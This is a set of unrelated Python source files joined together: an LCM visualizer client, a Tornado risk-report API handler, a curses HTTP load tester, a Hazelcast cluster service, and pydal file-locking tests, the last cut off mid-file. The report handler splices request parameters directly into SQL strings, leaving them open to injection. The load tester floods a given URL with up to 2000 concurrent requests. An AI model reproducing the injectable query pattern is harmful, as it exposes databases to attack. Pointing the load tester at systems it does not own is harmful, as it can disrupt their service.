self.publish_immediately = True
self.lcm.subscribe(self._response_channel(), self._handle_response)
self.handler_thread = None
def _request_channel(self):
return "DIRECTOR_TREE_VIEWER_REQUEST_<{:s}>".format(self.client_id)
def _response_channel(self):
return "DIRECTOR_TREE_VIEWER_RESPONSE_<{:s}>".format(self.client_id)
def _handler_loop(self):
while True:
self.lcm.handle()
def start_handler(self):
if self.handler_thread is not None:
return
self.handler_thread = threading.Thread(target=self._handler_loop)
self.handler_thread.daemon = True
self.handler_thread.start()
def _handle_response(self, channel, msgdata):
msg = viewer2_comms_t.decode(msgdata)
data = json.loads(msg.data.decode())
if data["status"] == 0:
pass
elif data["status"] == 1:
for path in self.tree.descendants():
self.queue.setgeometry.add(path)
self.queue.settransform.add(path)
else:
raise ValueError(
"Unhandled response from viewer: {}".format(msg.data.decode())
)
def setgeometry(self, path, geomdata):
if isinstance(geomdata, BaseGeometry):
self._load(path, [GeometryData(geomdata)])
elif isinstance(geomdata, Iterable):
self._load(path, geomdata)
else:
self._load(path, [geomdata])
def _load(self, path, geoms):
converted_geom_data = []
for geom in geoms:
if isinstance(geom, GeometryData):
converted_geom_data.append(geom)
else:
converted_geom_data.append(GeometryData(geom))
self.tree.getdescendant(path).geometries = converted_geom_data
self.queue.setgeometry.add(path)
self._maybe_publish()
def settransform(self, path, tform):
self.tree.getdescendant(path).transform = tform
self.queue.settransform.add(path)
self._maybe_publish()
def delete(self, path):
if not path:
self.tree = LazyTree()
else:
t = self.tree.getdescendant(path[:-1])
if path[-1] in t.children:
del t.children[path[-1]]
self.queue.delete.add(path)
self._maybe_publish()
def _maybe_publish(self):
if self.publish_immediately:
self.publish()
def publish(self):
if not self.queue.isempty():
data = self.serialize_queue()
msg = to_lcm(data)
self.lcm.publish(self._request_channel(), msg.encode())
self.queue.empty()
def serialize_queue(self):
delete = []
setgeometry = []
settransform = []
for path in self.queue.delete:
delete.append({"path": path})
for path in self.queue.setgeometry:
geoms = self.tree.getdescendant(path).geometries or []
setgeometry.append(
{"path": path, "geometries": [geom.serialize() for geom in geoms]}
)
for path in self.queue.settransform:
settransform.append(
{
"path": path,
"transform": serialize_transform(
self.tree.getdescendant(path).transform
),
}
)
return {
"utime": int(time.time() * 1e6),
"delete": delete,
"setgeometry": setgeometry,
"settransform": settransform,
}
if __name__ == "__main__":
# We can provide an initial path if we want
vis = Visualizer(path="/root/folder1")
# Start a thread to handle responses from the viewer. Doing this enables
# the automatic reloading of missing geometry if the viewer is restarted.
vis.start_handler()
vis["boxes"].setgeometry(
[
GeometryData(
Box([1, 1, 1]),
color=np.random.rand(4),
transform=transformations.translation_matrix([x, -2, 0]),
)
for x in range(10)
]
)
# Index into the visualizer to get a sub-tree. vis.__getitem__ is lazily
# implemented, so these sub-visualizers come into being as soon as they're
# asked for
vis = vis["group1"]
box_vis = vis["box"]
sphere_vis = vis["sphere"]
box = Box([1, 1, 1])
geom = GeometryData(box, color=[0, 1, 0, 0.5])
box_vis.setgeometry(geom)
sphere_vis.setgeometry(Sphere(0.5))
sphere_vis.settransform(transformations.translation_matrix([1, 0, 0]))
vis["test"].setgeometry(Triad())
vis["test"].settransform(
transformations.concatenate_matrices(
transformations.rotation_matrix(1.0, [0, 0, 1]),
transformations.translation_matrix([-1, 0, 1]),
)
)
vis["triad"].setgeometry(Triad())
# Setting the geometry preserves the transform at that path.
# Call settransform(np.eye(4)) if you want to clear the transform.
vis["test"].setgeometry(Triad())
# bug, the sphere is loaded and replaces the previous
# geometry but it is not drawn with the correct color mode
vis["test"].setgeometry(Sphere(0.5))
for theta in np.linspace(0, 2 * np.pi, 100):
vis.settransform(transformations.rotation_matrix(theta, [0, 0, 1]))
time.sleep(0.01)
# vis.delete()
|
notice_report.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
import logging
import threading
from tornado import gen
import tornado_mysql
from nebula.models.engine import tornado_mysql_config
from nebula.dao.user_dao import authenticated
from nebula.dao import cache
from nebula.views.base import BaseHandler
logger = logging.getLogger('nebula.api.notice_report')
mutex = threading.Lock()
CONDITIONS_QUERY = 'timestamp >= %s AND timestamp <= %s'
# 风险名单趋势
RISK_TREND_QUERY = 'SELECT `tsHour`, sum(`count`) FROM notice_stat WHERE %s GROUP BY `tsHour`'
# 风险类型分布SQL
RISK_TAG_TOP_QUERY = 'SELECT tag, sum(`count`) FROM notice_stat WHERE tag != "" AND %s GROUP BY tag ORDER BY sum(`count`) DESC'
# 风险账号相关SQL
RISK_DISCOVER_USER_QUERY = 'SELECT count(DISTINCT `key`) FROM notice_stat WHERE check_type = "USER" AND %s'
RISK_BLOCK_USER_QUERY = 'SELECT count(DISTINCT `key`) FROM notice_stat WHERE check_type = "USER" AND test = FALSE AND %s'
RISK_USER_TOP_QUERY = 'SELECT `key`, tag, sum(`count`), `tsHour` FROM notice_stat WHERE check_type = "USER" AND %s AND `key` IN (SELECT t.`key` FROM (SELECT `key` FROM notice_stat WHERE check_type = "USER" AND %s GROUP BY `key` ORDER BY sum(`count`) DESC LIMIT 10) AS t) GROUP BY `key`, tag, `tsHour`'
# 风险IP相关SQL
RISK_DISCOVER_IP_QUERY = 'SELECT count(DISTINCT `key`) FROM notice_stat WHERE check_type = "IP" AND %s'
RISK_BLOCK_IP_QUERY = 'SELECT count(DISTINCT `key`) FROM notice_stat WHERE check_type = "IP" AND test = FALSE AND %s'
RISK_IP_TOP_QUERY = 'SELECT `key`, geo_city, tag, sum(`count`), `tsHour` FROM notice_stat WHERE check_type = "IP" AND %s AND `key` IN (SELECT t.`key` FROM (SELECT `key` FROM notice_stat WHERE check_type = "IP" AND %s GROUP BY `key` ORDER BY sum(`count`) DESC LIMIT 10)AS t) GROUP BY `key`, geo_city, tag, `tsHour`'
RISK_GEO_TOP_QUERY = 'SELECT geo_city, sum(`count`) FROM notice_stat WHERE check_type = "IP" AND %s GROUP BY geo_city ORDER BY sum(`count`) DESC LIMIT 8'
RISK_URL_TOP_QUERY = 'SELECT uri_stem, sum(`count`), `tsHour` FROM notice_stat WHERE check_type = "IP" AND %s AND `uri_stem` IN (SELECT t.`uri_stem` FROM (SELECT `uri_stem` FROM notice_stat WHERE check_type = "IP" AND %s GROUP BY `uri_stem` ORDER BY sum(`count`) DESC LIMIT 10)AS t) GROUP BY uri_stem, `tsHour`'
notice_report = {}
def set_notice_report_value(key, value=None):
with mutex:
notice_report[key] = value
def risk_trend_callcack(cursor, *args):
# 风险名单趋势,没有数据的补0
trend_ts = args[0]
risk_trend_tmp = {}
for r in cursor:
timestamp, count = r
risk_trend_tmp[timestamp] = int(count)
set_notice_report_value(
'risk_trend', [{ts: risk_trend_tmp.get(ts, 0)} for ts in trend_ts])
def risk_tag_top_callback(cursor, *args):
# 查询风险类型分布,只取排名前五,其余tag总和为其他标签
risk_tag_top = [{tag: int(count)} for tag, count in cursor[:5]]
other_tag_count = sum([int(count) for _, count in cursor[5:]])
if other_tag_count > 0:
risk_tag_top.append({u'其他': other_tag_count})
set_notice_report_value('risk_tag_top', risk_tag_top)
def risk_discover_user_callback(cursor, *args):
# 查询风险账号总数
for _ in cursor:
user_count = int(_[0])
set_notice_report_value('risk_discover_stat_user', user_count)
def risk_block_user_callback(cursor, *args):
# 查询拦截风险账号总数,拦截账号为test为FALSE
for _ in cursor:
user_count = int(_[0])
set_notice_report_value('risk_block_stat_user', user_count)
def risk_user_top_callback(cursor, *args):
# 查询风险账号TOP 10相关数据
risk_user_top = []
trend_ts = args[0]
last_key = None
for _ in cursor:
key, tag, count, timestamp = _
if key == last_key:
risk_user_top[-1]['type'][tag] = risk_user_top[-1][
'type'].get(tag, 0) + int(count)
risk_user_top[-1]['trend'][timestamp] = risk_user_top[-1][
'trend'].get(timestamp, 0) + int(count)
risk_user_top[-1]['count'] += int(count)
else:
last_key = key
last_user = {
'name': key,
'trend': {timestamp: int(count)},
'type': {tag: int(count)},
'count': int(count)
}
risk_user_top.append(last_user)
risk_user_top = sorted(risk_user_top, key=lambda _: _[
'count'], reverse=True)
for user in risk_user_top:
user['trend'] = [{ts: user['trend'].get(ts, 0)} for ts in trend_ts]
set_notice_report_value('risk_user_top', risk_user_top)
def risk_ip_top_callback(cursor, *args):
# 查询风险IP top 10相关数据
risk_ip_top = []
trend_ts = args[0]
last_key = ''
for _ in cursor:
key, geo_city, tag, count, timestamp = _
if key == last_key:
risk_ip_top[-1]['type'][tag] = risk_ip_top[-1][
'type'].get(tag, 0) + int(count)
risk_ip_top[-1]['trend'][timestamp] = risk_ip_top[-1][
'trend'].get(timestamp, 0) + int(count)
risk_ip_top[-1]['count'] += int(count)
else:
last_key = key
last_ip = {
'name': key,
'trend': {timestamp: int(count)},
'type': {tag: int(count)},
'geo_city': geo_city,
'count': int(count)
}
risk_ip_top.append(last_ip)
risk_ip_top = sorted(risk_ip_top, key=lambda _: _['count'], reverse=True)
for ip in risk_ip_top:
ip['trend'] = [{ts: ip['trend'].get(ts, 0)} for ts in trend_ts]
set_notice_report_value('risk_ip_top', risk_ip_top)
def risk_discover_ip_callback(cursor, *args):
# 查询风险IP总数
for _ in cursor:
ip_count = int(_[0])
set_notice_report_value('risk_discover_stat_ip', ip_count)
def risk_block_ip_callback(cursor, *args):
# 查询拦截风险IP总数,拦截IP为test为FALSE
for _ in cursor:
ip_count = int(_[0])
set_notice_report_value('risk_block_stat_ip', ip_count)
def risk_geo_top_callback(cursor, *args):
# 风险IP地理位置
risk_geo_top = []
for _ in cursor:
city, count = _
risk_geo_top.append({city: int(count)})
set_notice_report_value('risk_geo_top', risk_geo_top)
def risk_url_top_callback(cursor, *args):
# 风险IP访问主要URL TOP10
trend_ts = args[0]
risk_url_top = []
last_uri_stem = None
for _ in cursor:
uri_stem, count, timestamp = _
if uri_stem == last_uri_stem:
risk_url_top[-1]['trend'][timestamp] = int(count)
risk_url_top[-1]['count'] += int(count)
else:
last_uri_stem = uri_stem
last_uri = {
'name': uri_stem,
'trend': {timestamp: int(count)},
'count': int(count)
}
risk_url_top.append(last_uri)
risk_url_top = sorted(risk_url_top, key=lambda _: _['count'], reverse=True)
for url in risk_url_top:
url['trend'] = [{ts: url['trend'].get(ts, 0)} for ts in trend_ts]
set_notice_report_value('risk_url_top', risk_url_top)
class NoticeReportHandler(BaseHandler):
REST_URL = '/platform/stats/notice_report'
@gen.coroutine
@authenticated
def get(self):
"""
@API
summary: 风险名单报表数据接口
tags:
- platform
parameters:
- name: key
in: query
required: false
type: string
description: notice key包含的字符串
- name: strategy
in: query
required: false
type: string
description: notice命中的策略,支持多个策略名字
- name: sceneType
in: query
required: false
type: string
description: notice命中的场景,支持多个场景
- name: checkType
in: query
required: false
type: string
description: notice类型,支持多个类型
- name: decision
in: query
required: false
type: string
description: notice操作建议类型,支持多个操作
- name: fromtime
in: query
required: true
type: timestamp
description: notice报警时间应大于等于fromtime
- name: endtime
in: query
required: true
type: timestamp
description: notice报警时间应小于等于endtime
- name: test
in: query
required: false
type: boolean
description: notice是否是测试名单
- name: tag
in: query
required: false
type: string
description: filter notice strategy tag
produces:
- application/json
"""
key = self.get_argument('key', default=None)
fromtime = self.get_argument('fromtime', default=None)
endtime = self.get_argument('endtime', default=None)
strategies = self.get_arguments('strategy')
scene_types = self.get_arguments('sceneType')
check_types = self.get_arguments('checkType')
decisions = self.get_arguments('decision')
test = self.get_argument('test', default=None)
tags = self.get_arguments('tag') # 策略风险标签
self.set_header('content-type', 'application/json')
if not fromtime or not endtime:
self.process_error(-1, '缺少fromtime或endtime参数')
return
# 初始化查询条件子句
hour = 3600000
fromtime = int(fromtime) / 1000 / 3600 * hour
endtime = int(endtime) / 1000 / 3600 * hour
# 避免时间fromtime 12:00:00和endtime12:59:59经过处理后全部被同步成12:00:00
# 所以对endtime进行处理,保证最少返回from time开始后一个小时数据
if fromtime == endtime:
endtime = fromtime + hour
trend_ts = [ts for ts in range(fromtime, endtime + hour, hour)]
conditions_query = CONDITIONS_QUERY % (fromtime, endtime)
if key:
conditions_query = conditions_query + ' AND ' + '`key` = "%s"' % key
if tags:
# 根据风险标签,查询策略名
if cache.Strategy_Weigh_Cache is None:
from nebula.dao.strategy_dao import init_strategy_weigh
init_strategy_weigh()
strategy_weigh = filter(lambda s: list(set(tags) & (
set(s['tags']))), cache.Strategy_Weigh_Cache.values())
strategies.extend([s['name'] for s in strategy_weigh])
if strategies:
conditions_query = conditions_query + ' AND ' + \
"strategy_name IN (%s)" % ','.join(
['"%s"' % _ for _ in strategies])
if scene_types:
conditions_query = conditions_query + ' AND ' + \
'scene_name IN (%s)' % ','.join(
['"%s"' % _ for _ in scene_types])
if check_types:
conditions_query = conditions_query + ' AND ' + \
'check_type IN (%s)' % ','.join(
['"%s"' % _ for _ in check_types])
if decisions:
conditions_query = conditions_query + ' AND ' + \
'decision IN (%s)' % ','.join(['"%s"' % _ for _ in decisions])
if test is not None:
test = 'TRUE' if test.lower() == 'true' else 'FALSE'
conditions_query = conditions_query + ' AND ' + 'test = %s' % test
try:
# 初始化数据库连接
conn = yield tornado_mysql.connect(**tornado_mysql_config)
cursor = conn.cursor()
sql_list = list()
callback_list = list()
# 查询风险名单趋势
sql_list.append(RISK_TREND_QUERY % conditions_query)
callback_list.append(risk_trend_callcack)
# 查询风险类型分布
sql_list.append(RISK_TAG_TOP_QUERY % conditions_query)
callback_list.append(risk_tag_top_callback)
# 查询风险账号相关数据
if check_types and 'USER' not in check_types:
set_notice_report_value('risk_discover_stat_user', 0)
set_notice_report_value('risk_block_stat_user', 0)
set_notice_report_value('risk_user_top', 0)
else:
# 查询风险账号总数
sql_list.append(RISK_DISCOVER_USER_QUERY % conditions_query)
callback_list.append(risk_discover_user_callback)
# 查询拦截风险账号总数
if test == 'TRUE':
set_notice_report_value('risk_block_stat_user', 0)
else:
sql_list.append(RISK_BLOCK_USER_QUERY % conditions_query)
callback_list.append(risk_block_user_callback)
# 查询风险账号TOP 10
sql_list.append(RISK_USER_TOP_QUERY %
(conditions_query, conditions_query))
callback_list.append(risk_user_top_callback)
# 查询风险IP相关数据
if check_types and 'IP' not in check_types:
set_notice_report_value('risk_discover_stat_ip', 0)
set_notice_report_value('risk_block_stat_ip', 0)
set_notice_report_value('risk_ip_top', [])
set_notice_report_value('risk_geo_top', [])
set_notice_report_value('risk_url_top', [])
else:
# 查询风险IP总数
sql_list.append(RISK_DISCOVER_IP_QUERY % conditions_query)
callback_list.append(risk_discover_ip_callback)
# 查询拦截风险IP总数
if test == 'TRUE':
set_notice_report_value('risk_block_stat_ip', 0)
else:
sql_list.append(RISK_BLOCK_IP_QUERY % conditions_query)
callback_list.append(risk_block_ip_callback)
# 查询风险IP top 10
sql_list.append(RISK_IP_TOP_QUERY %
(conditions_query, conditions_query))
callback_list.append(risk_ip_top_callback)
# 风险IP地理位置
sql_list.append(RISK_GEO_TOP_QUERY % conditions_query)
callback_list.append(risk_geo_top_callback)
# 风险IP访问主要URL TOP10
sql_list.append(RISK_URL_TOP_QUERY %
(conditions_query, conditions_query))
callback_list.append(risk_url_top_callback)
# 数据库执行查询语句
sql_statements = ';'.join(sql_list)
yield cursor.execute(sql_statements)
# 将查询结果的callback方法,多线程处理
threads = []
for callback in callback_list:
t = threading.Thread(
target=callback, args=(cursor.fetchall(), trend_ts))
threads.append(t)
yield cursor.nextset()
for t in threads:
t.setDaemon(True)
t.start()
t.join()
cursor.close()
conn.close()
# 返回多线程处理结束后的结果
self.finish(json.dumps(
{'status': 200, 'msg': 'ok', 'values': notice_report}))
except Exception as e:
logger.error(e)
self.process_error(-1, '报表生成失败,请重新查询')
|
tolerance.py
|
from threading import Thread
import threading
import Queue
import time
from socket import error as SocketError
import sys
try:
import requests
import curses
import click
except ImportError:
print 'Tolerance requires the following Python modules: Requests and Click. You should be able to ' \
'`sudo pip install requests click`'
sys.exit(1)
import utils
q = Queue.Queue()
result_codes = {}
_timeout = None
elapsed = []
timeout_count = 0
connection_error_count = 0
non_200_count = 0
durations = []
main_start = None
status = "Starting up"
test_number = 1
total_seconds = 0
test_start = None
test_stop = None
test_seconds = None
target_hits = None
requests_handled = 0
_tolerance = None
_url = None
hits = None
workers = None
break_out = False
import logging
logging.basicConfig(filename='log.log', level=logging.WARNING)
def do_work():
global _timeout, timeout_count, connection_error_count, main_start, status, non_200_count, total_seconds, \
test_start, test_stop, requests_handled, _tolerance, break_out
while True:
try:
url = q.get(True, 2)
except Queue.Empty:
break
status = "Running"
if test_start is None:
test_start = time.time()
if main_start is None:
main_start = time.time()
try:
start = time.time()
res = requests.get(url, timeout=_timeout)
elapsed.append(res.elapsed.total_seconds())
if '%s %s' % (res.status_code, res.reason) not in result_codes:
result_codes['%s %s' % (res.status_code, res.reason)] = 0
result_codes['%s %s' % (res.status_code, res.reason)] += 1
if res.status_code == 200:
durations.append(time.time() - start)
else:
non_200_count += 1
except requests.RequestException:
timeout_count += 1
non_200_count += 1
except SocketError:
connection_error_count += 1
non_200_count += 1
requests_handled += 1
if non_200_count > _tolerance:
break_out = True
test_stop = time.time()
with q.mutex:
q.queue.clear()
q.task_done()
status = "Failed, stopping..."
break
if requests_handled == target_hits:
test_stop = time.time()
q.task_done()
def update_ui_worker():
global main_start, total_seconds, _timeout, hits, workers, status, test_number, total_seconds, test_start, \
test_stop, requests_handled, test_seconds, _tolerance, _url, break_out
while True:
rc = utils.render_result_codes(result_codes, timeout_count, connection_error_count)
if not q.empty() and main_start:
total_seconds = time.time()-main_start
screen.addstr(1, 2, 'PAIN TOLERANCE on %s' % _url, curses.color_pair(3)|curses.A_BOLD)
screen.addstr(3, 2, 'Status: %s ' % status)
screen.addstr(5, 2, 'Trying %s hits with %s workers ' % (hits, workers))
screen.addstr(6, 2, 'Timeout: %s seconds ' % (_timeout,))
screen.addstr(6, 40, 'Tolerance: %s errors ' % (_tolerance,))
screen.addstr(7, 2, 'Active Workers: %s ' % (threading.active_count() - 2))
screen.addstr(7, 40, 'Queue: %s ' % q.qsize())
if test_start is None:
test_seconds = 0
else:
if test_stop is None:
test_seconds = time.time() - test_start
else:
test_seconds = test_stop - test_start
screen.addstr(9, 2, 'Test Seconds: %.2f ' % test_seconds)
screen.addstr(9, 40, 'Requests handled: %s ' % requests_handled)
if result_codes and test_seconds and '200 OK' in result_codes:
screen.addstr(10, 2, 'Requests per second: %.2f ' % (int(result_codes['200 OK']) / test_seconds), )
if durations:
screen.addstr(10, 40, 'Average Request: %.2f seconds ' % (reduce(lambda x, y: x + y, durations) / len(durations)))
screen.addstr(12, 2, rc)
screen.refresh()
time.sleep(0.1)
tests = [
(50, 50,),
(100, 100,),
(200, 200,),
(400, 400,),
(600, 600,),
(800, 800,),
(1000, 1000,),
(1500, 1000,),
(2000, 1000,),
(2000, 1500,),
(2000, 2000,)
]
@click.command()
@click.option('--url', prompt="URL to request")
@click.option('--timeout', default=10)
@click.option('--tolerance', default=5)
def main(url, timeout, tolerance):
global break_out, status, target_hits, timeout_count, connection_error_count, non_200_count, test_number, \
result_codes, elapsed, requests_handled, test_start, test_stop, _timeout, _tolerance, screen, hits, workers, \
_url, durations
_timeout = timeout
_tolerance = tolerance
_url = url
logging.warning('Starting up...')
# Check that the url provided is valid
try:
requests.get(url, timeout=5)
except requests.exceptions.MissingSchema:
print "Invalid URL"
sys.exit(1)
except requests.exceptions.ConnectionError:
print "Is that a valid URL? We can't connect to it."
sys.exit(1)
except Exception as e:
print "Something went wrong trying to connect... timeout?"
print e
sys.exit(1)
try:
screen = curses.initscr()
screen.border(0)
curses.start_color()
curses.init_color(0, 0, 0, 0)
curses.init_pair(2, curses.COLOR_RED, curses.COLOR_BLACK)
curses.init_pair(3, curses.COLOR_GREEN, curses.COLOR_BLACK)
curses.init_pair(10, curses.COLOR_CYAN, curses.COLOR_BLACK)
curses.init_pair(11, curses.COLOR_CYAN, curses.COLOR_BLACK)
curses.curs_set(0)
# curses.noecho()
ui = Thread(target=update_ui_worker)
ui.daemon = True
ui.start()
for test in tests:
hits = test[0]
workers = test[1]
if break_out:
break
target_hits = hits
for t in range(hits):
q.put(url)
for w in range(workers):
t = Thread(target=do_work)
t.start()
# q.join()
status = "Waiting for workers to spin down..."
while True:
if threading.active_count() <= 2:
break
if timeout_count + connection_error_count + non_200_count > tolerance:
result = 'Fail'
cp = curses.color_pair(2)|curses.A_BOLD
else:
result = 'Pass'
cp = curses.color_pair(3)|curses.A_BOLD
result_200 = result_codes.get('200 OK')
if result_200 is None:
result_200 = 0
else:
result_200 = int(result_200)
if durations:
average_request_time = reduce(lambda x, y: x + y, durations) / len(durations)
if test_seconds:
screen.addstr(13 + test_number, 2, '%s hits with %s workers: %s (%.2f RPS | %.2f ART | %d ERR) ' %
(hits, workers, result, result_200/test_seconds, average_request_time, non_200_count), cp)
if 'Fail' in result:
break_out = True
break
status = "Restarting..."
time.sleep(2)
result_codes = {}
non_200_count = 0
elapsed = []
durations = []
timeout_count = 0
connection_error_count = 0
test_number += 1
requests_handled = 0
test_start = None
test_stop = None
except KeyboardInterrupt:
with q.mutex:
q.queue.clear()
break_out = True
test_stop = time.time()
screen.addstr(16 + test_number, 2, "Test cancelled.")
logging.warning('Keyboard Exit')
finally:
curses.endwin()
logging.warning('Exit 2a')
screen.addstr(16 + test_number, 2, "Press any key to exit.")
screen.getch()
curses.endwin()
logging.warning('Exit 2')
if __name__ == "__main__":
main()
|
cluster.py
|
import logging
import random
import threading
import time
import uuid
from hazelcast.core import CLIENT_TYPE, SERIALIZATION_VERSION
from hazelcast.exception import HazelcastError, AuthenticationError, TargetDisconnectedError
from hazelcast.invocation import ListenerInvocation
from hazelcast.lifecycle import LIFECYCLE_STATE_CONNECTED, LIFECYCLE_STATE_DISCONNECTED
from hazelcast.protocol.codec import client_add_membership_listener_codec, client_authentication_codec
from hazelcast.util import get_possible_addresses
# Membership Event Types
MEMBER_ADDED = 1
MEMBER_REMOVED = 2
class ClusterService(object):
logger = logging.getLogger("ClusterService")
def __init__(self, config, client):
self._config = config
self._client = client
self.members = []
self.owner_connection_address = None
self.owner_uuid = None
self.uuid = None
self.listeners = {}
for listener in config.membership_listeners:
self.add_listener(*listener)
self._initial_list_fetched = threading.Event()
self._client.connection_manager.add_listener(on_connection_closed=self._connection_closed)
self._client.heartbeat.add_listener(on_heartbeat_stopped=self._heartbeat_stopped)
def start(self):
self._connect_to_cluster()
def shutdown(self):
pass
def size(self):
return len(self.members)
def add_listener(self, member_added=None, member_removed=None, fire_for_existing=False):
registration_id = str(uuid.uuid4())
self.listeners[registration_id] = (member_added, member_removed)
if fire_for_existing:
for member in self.members:
member_added(member)
return registration_id
def remove_listener(self, registration_id):
try:
self.listeners.pop(registration_id)
return True
except KeyError:
return False
def _reconnect(self):
try:
self.logger.warn("Connection closed to owner node. Trying to reconnect.")
self._connect_to_cluster()
except:
logging.exception("Could not reconnect to cluster. Shutting down client.")
self._client.shutdown()
def _connect_to_cluster(self): # TODO: can be made async
addresses = get_possible_addresses(self._config.network_config.addresses, self.members)
current_attempt = 1
attempt_limit = self._config.network_config.connection_attempt_limit
retry_delay = self._config.network_config.connection_attempt_period
while current_attempt <= self._config.network_config.connection_attempt_limit:
for address in addresses:
try:
self.logger.info("Connecting to %s", address)
self._connect_to_address(address)
return
except:
self.logger.warning("Error connecting to %s, attempt %d of %d, trying again in %d seconds",
address, current_attempt, attempt_limit, retry_delay, exc_info=True)
time.sleep(retry_delay)
current_attempt += 1
error_msg = "Could not connect to any of %s after %d tries" % (addresses, attempt_limit)
raise HazelcastError(error_msg)
def _authenticate_manager(self, connection):
request = client_authentication_codec.encode_request(
username=self._config.group_config.name, password=self._config.group_config.password,
uuid=None, owner_uuid=None, is_owner_connection=True, client_type=CLIENT_TYPE,
serialization_version=SERIALIZATION_VERSION)
def callback(f):
parameters = client_authentication_codec.decode_response(f.result())
if parameters["status"] != 0: # TODO: handle other statuses
raise AuthenticationError("Authentication failed.")
connection.endpoint = parameters["address"]
connection.is_owner = True
self.owner_uuid = parameters["owner_uuid"]
self.uuid = parameters["uuid"]
return connection
return self._client.invoker.invoke_on_connection(request, connection).continue_with(callback)
def _connect_to_address(self, address):
connection = self._client.connection_manager.get_or_connect(address, self._authenticate_manager).result()
if not connection.is_owner:
self._authenticate_manager(connection).result()
self.owner_connection_address = connection.endpoint
self._init_membership_listener(connection)
self._client.lifecycle.fire_lifecycle_event(LIFECYCLE_STATE_CONNECTED)
def _init_membership_listener(self, connection):
request = client_add_membership_listener_codec.encode_request(False)
def handler(m):
client_add_membership_listener_codec.handle(m, self._handle_member, self._handle_member_list)
response = self._client.invoker.invoke(
ListenerInvocation(request, handler, connection=connection)).result()
registration_id = client_add_membership_listener_codec.decode_response(response)["response"]
self.logger.debug("Registered membership listener with ID " + registration_id)
self._initial_list_fetched.wait()
def _handle_member(self, member, event_type):
self.logger.debug("Got member event: %s, %s", member, event_type)
if event_type == MEMBER_ADDED:
self._member_added(member)
elif event_type == MEMBER_REMOVED:
self._member_removed(member)
self._log_member_list()
self._client.partition_service.refresh()
def _handle_member_list(self, members):
self.logger.debug("Got initial member list: %s", members)
for m in list(self.members):
try:
members.remove(m)
except ValueError:
self._member_removed(m)
for m in members:
self._member_added(m)
self._log_member_list()
self._client.partition_service.refresh()
self._initial_list_fetched.set()
def _member_added(self, member):
self.members.append(member)
for added, _ in self.listeners.values():
if added:
try:
added(member)
except:
logging.exception("Exception in membership listener")
def _member_removed(self, member):
self.members.remove(member)
self._client.connection_manager.close_connection(member.address, TargetDisconnectedError(
"%s is no longer a member of the cluster" % member))
for _, removed in self.listeners.values():
if removed:
try:
removed(member)
except:
logging.exception("Exception in membership listener")
def _log_member_list(self):
self.logger.info("New member list:\n\nMembers [%d] {\n%s\n}\n", len(self.members),
"\n".join(["\t" + str(x) for x in self.members]))
def _connection_closed(self, connection, _):
if connection.endpoint and connection.endpoint == self.owner_connection_address \
and self._client.lifecycle.is_live:
self._client.lifecycle.fire_lifecycle_event(LIFECYCLE_STATE_DISCONNECTED)
self.owner_connection_address = None
# try to reconnect, on new thread
# TODO: can we avoid having a thread here?
reconnect_thread = threading.Thread(target=self._reconnect, name="hazelcast-cluster-reconnect")
reconnect_thread.daemon = True
reconnect_thread.start()
def _heartbeat_stopped(self, connection):
if connection.endpoint == self.owner_connection_address:
self._client.connection_manager.close_connection(connection.endpoint, TargetDisconnectedError(
"%s stopped heart beating." % connection))
def get_member_by_uuid(self, member_uuid):
for member in self.members:
if member.uuid == member_uuid:
return member
class RandomLoadBalancer(object):
def __init__(self, cluster):
self._cluster = cluster
def next_address(self):
return random.choice(self._cluster.members).address
|
contribs.py
|
import os
import threading
import time
from ._compat import unittest
from ._adapt import IS_GAE
from pydal._compat import to_bytes
from pydal.contrib.portalocker import lock, unlock, read_locked, write_locked
from pydal.contrib.portalocker import LockedFile, LOCK_EX
def tearDownModule():
if os.path.isfile('test.txt'):
os.unlink('test.txt')
class testPortalocker(unittest.TestCase):
def test_LockedFile(self):
f = LockedFile('test.txt', mode='wb')
f.write(to_bytes('test ok'))
f.close()
f = LockedFile('test.txt', mode='rb')
self.assertEqual(f.read(), to_bytes('test ok'))
f.close()
@unittest.skipIf(IS_GAE, "GAE has no locks")
def test_openmultiple(self):
t0 = time.time()
def worker1():
start = time.time()
f1 = LockedFile('test.txt', mode='ab')
time.sleep(2)
f1.write(to_bytes("%s\t%s\n" % (start, time.time())))
f1.close()
f = LockedFile('test.txt', mode='wb')
f.write(to_bytes(''))
f.close()
th = []
for x in range(10):
t1 = threading.Thread(target=worker1)
th.append(t1)
t1.start()
for t in th:
t.join()
with open('test.txt') as g:
content = g.read()
results = [line.strip().split('\t') for line in content.split('\n') if line]
# all started at more or less the same time
starts = [1 for line in results if float(line[0])-t0<1]
ends = [line[1] for line in results]
self.assertEqual(sum(starts), len(starts))
# end - start is at least 2
for line in results:
self.assertTrue(float(line[1]) - float(line[0]) >= 2)
# ends are not the same
self.assertTrue(len(ends) == len(ends))
@unittest.skipIf(IS_GAE, "GAE has no locks")
def test_lock_unlock(self):
def worker1(fh):
time.sleep(2)
unlock(fh)
def worker2(fh):
time.sleep(2)
fh.close()
f = open('test.txt', mode='wb')
lock(f, LOCK_EX)
f.write(to_bytes('test ok'))
t1 = threading.Thread(target=worker1, args=(f, ))
t1.start()
start = int(time.time())
content = read_locked('test.txt')
end = int(time.time())
t1.join()
f.close()
# it took at least 2 seconds to read
# although nothing is there until .close()
self.assertTrue(end - start >= 2)
self.assertEqual(content, to_bytes(''))
content = read_locked('test.txt')
self.assertEqual(content, to_bytes('test ok'))
f = LockedFile('test.txt', mode='wb')
f.write(to_bytes('test ok'))
t1 = threading.Thread(target=worker2, args=(f, ))
t1.start()
start = int(time.time())
content = read_locked('test.txt')
end = int(time.time())
t1.join()
# it took at least 2 seconds to read
# content is there because we called close()
self.assertTrue(end - start >= 2)
self.assertEqual(content, to_bytes('test ok'))
@unittest.skipIf(IS_GAE, "GAE has no locks")
def test_read_locked(self):
def worker(fh):
time.sleep(2)
fh.close()
f = LockedFile('test.txt', mode='wb')
f.write(to_bytes('test ok'))
t1 = threading.Thread(target=worker, args=(f, ))
t1.start()
start = int(time.time())
content = read_locked('test.txt')
end = int(time.time())
t1.join()
# it took at least 2 seconds to read
self.assertTrue(end - start >= 2)
self.assertEqual(content, to_bytes('test ok'))
@unittest.skipIf(IS_GAE, "GAE has no locks")
def test_write_locked(self):
def worker(fh):
time.sleep(2)
fh.close()
f = open('test.txt', mode='wb')
lock(f, LOCK_EX)
t1 = threading.Thread(target=worker, args=(f, ))
t1.start()
start = int(time.time())
write_locked('test.txt', to_bytes('test ok'))
end = int(time.time())
t1.join()
with open('test.txt') as g:
content = g.read()
# it took at least 2 seconds to read
self.assertTrue(end - start >= 2)
self.assertEqual(content, 'test ok')
def test_exception(self):
